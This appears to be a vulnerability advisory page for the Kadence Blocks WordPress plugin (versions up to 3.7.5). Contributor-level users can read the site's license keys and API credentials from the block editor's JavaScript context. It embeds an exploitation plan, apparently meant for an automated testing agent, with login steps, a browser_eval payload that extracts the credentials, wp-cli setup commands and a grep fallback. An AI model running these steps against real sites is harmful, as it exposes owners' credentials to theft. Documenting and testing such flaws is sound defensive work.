Kadence Blocks <= 3.7.5 - Authenticated (Contributor+) Sensitive Information Exposure via Block Editor proData Localization
Description
The Kadence Blocks — Page Builder Toolkit for Gutenberg Editor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.7.5 via the editor_assets_variables. This makes it possible for authenticated attackers, with contributor-level access and above, to extract the site's connected Kadence account license key, license owner email, api_key, api_email, and license domain from the browser console by inspecting window.kadence_blocks_params.proData. Exploitation requires only that an administrator has previously connected a valid Kadence license; the full credential bundle is then readable by any Contributor-level user from the block editor client context without any server-side request manipulation.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NTechnical Details
<=3.7.5What Changed in the Fix
Changes introduced in v3.7.6
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-11357 - Kadence Blocks Sensitive Information Exposure ## 1. Vulnerability Summary The **Kadence Blocks** plugin (<= 3.7.5) is vulnerable to **Sensitive Information Exposure**. The plugin's editor asset initialization logic enqueues site-wide license credential…
Show full research plan
Exploitation Research Plan: CVE-2026-11357 - Kadence Blocks Sensitive Information Exposure
1. Vulnerability Summary
The Kadence Blocks plugin (<= 3.7.5) is vulnerable to Sensitive Information Exposure. The plugin's editor asset initialization logic enqueues site-wide license credentials and API keys into the global JavaScript context of the WordPress block editor (Gutenberg). Because any user with Contributor permissions or higher can access the post editor, they can retrieve the administrator's Kadence license key, API keys, and associated emails directly from the browser's global scope without requiring administrative privileges.
The vulnerability exists in KadenceWP\KadenceBlocks\Editor_Assets::editor_assets_variables, which is hooked to enqueue_block_editor_assets.
2. Attack Vector Analysis
- Authentication Level: Authenticated (Contributor+).
- Target Endpoint: Any Gutenberg-enabled editor page, such as
/wp-admin/post-new.phpor/wp-admin/post.php?post=[ID]&action=edit. - Vulnerable Mechanism: The
wp_localize_scriptfunction is used to pass server-side data to the client-sidekadence-blocks-jsscript. - Exposure Point: The global JavaScript object
window.kadence_blocks_params.proData.
3. Code Flow
- Initialization: The
Editor_Assetsclass (inincludes/class-kadence-blocks-editor-assets.php) registers its hooks in the constructor:add_action( 'enqueue_block_editor_assets', [ $this, 'editor_assets_variables' ] ); - Asset Enqueueing: When a user (Contributor or above) loads the post editor, WordPress triggers the
enqueue_block_editor_assetshook. - Data Collection:
Editor_Assets::editor_assets_variables()is executed. It retrieves sensitive license data using helper functions likekadence_blocks_get_current_license_data()andKadenceWP\KadenceBlocks\StellarWP\Uplink\get_license_domain(). - Localization: The collected data is packed into an array (specifically under the
proDatakey) and passed to the browser via:wp_localize_script( 'kadence-blocks-js', 'kadence_blocks_params', $variables ); - Exposure: The browser receives the sensitive data in a
<script>tag, populatingwindow.kadence_blocks_params.
4. Nonce Acquisition Strategy
This vulnerability does not require a WordPress nonce for exploitation. The sensitive information is automatically localized and made available in the global JS scope upon successfully loading the WordPress editor page. The only requirement is a valid session cookie for a user with the edit_posts capability.
5. Exploitation Strategy
The goal is to log in as a Contributor and read the proData object from the editor context.
Step 1: Authentication
Use the http_request tool to log in as a Contributor user and obtain a valid session cookie.
Step 2: Navigate to Editor
Navigate to the "New Post" page to trigger the Gutenberg editor.
- URL:
http://[target]/wp-admin/post-new.php
Step 3: Extract Data
Once the page is loaded, use browser_eval to extract the sensitive credentials.
Payload:
JSON.stringify(window.kadence_blocks_params?.proData || "Data not found")
Step 4: Capture Response
The extracted object should contain keys such as:
api_keyapi_emaillicense_keylicense_emaillicense_domain
6. Test Data Setup
To demonstrate the exposure, the environment must have "mocked" license data stored in the database.
- Install Plugin: Ensure Kadence Blocks version 3.7.5 is active.
- Create Contributor User:
wp user create attacker attacker@example.com --role=contributor --user_pass=password - Mock License Data: Kadence typically stores license data in the
optionstable. Usewp evalto inject dummy data:wp eval 'update_option("kadence_blocks_license_data", [ "api_key" => "EXPLOIT-KEY-12345", "api_email" => "admin@target.com", "license_key" => "LICENSE-67890", "license_email" => "admin@target.com", "license_domain" => "target.com" ]);' # Also mock legacy or pro data if needed based on version specifics wp eval 'update_option("kt_api_manager_kadence_gutenberg_pro_data", [ "api_key" => "PRO-API-KEY-999", "api_email" => "pro@target.com" ]);'
7. Expected Results
A successful exploit will return a JSON object containing the mocked license details:
{
"api_key": "EXPLOIT-KEY-12345",
"api_email": "admin@target.com",
"license_key": "LICENSE-67890",
"license_email": "admin@target.com",
"license_domain": "target.com"
}
8. Verification Steps
- Compare Output: Verify that the keys and values extracted via
browser_evalmatch the values injected into the database viawp evalin the setup phase. - Check Capability: Attempt the same
browser_evalas an unauthenticated user (should fail with a redirect towp-login.php) to confirm theAuthenticated (Contributor+)requirement.
9. Alternative Approaches
If window.kadence_blocks_params is not directly accessible, inspect the page source via http_request and search for the localized script string:
# Look for the localization pattern in the HTML response
grep -o "var kadence_blocks_params = [^;]*;"
This serves as a backup if the Gutenberg editor fails to initialize fully in the headless browser but the script tags are still rendered.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.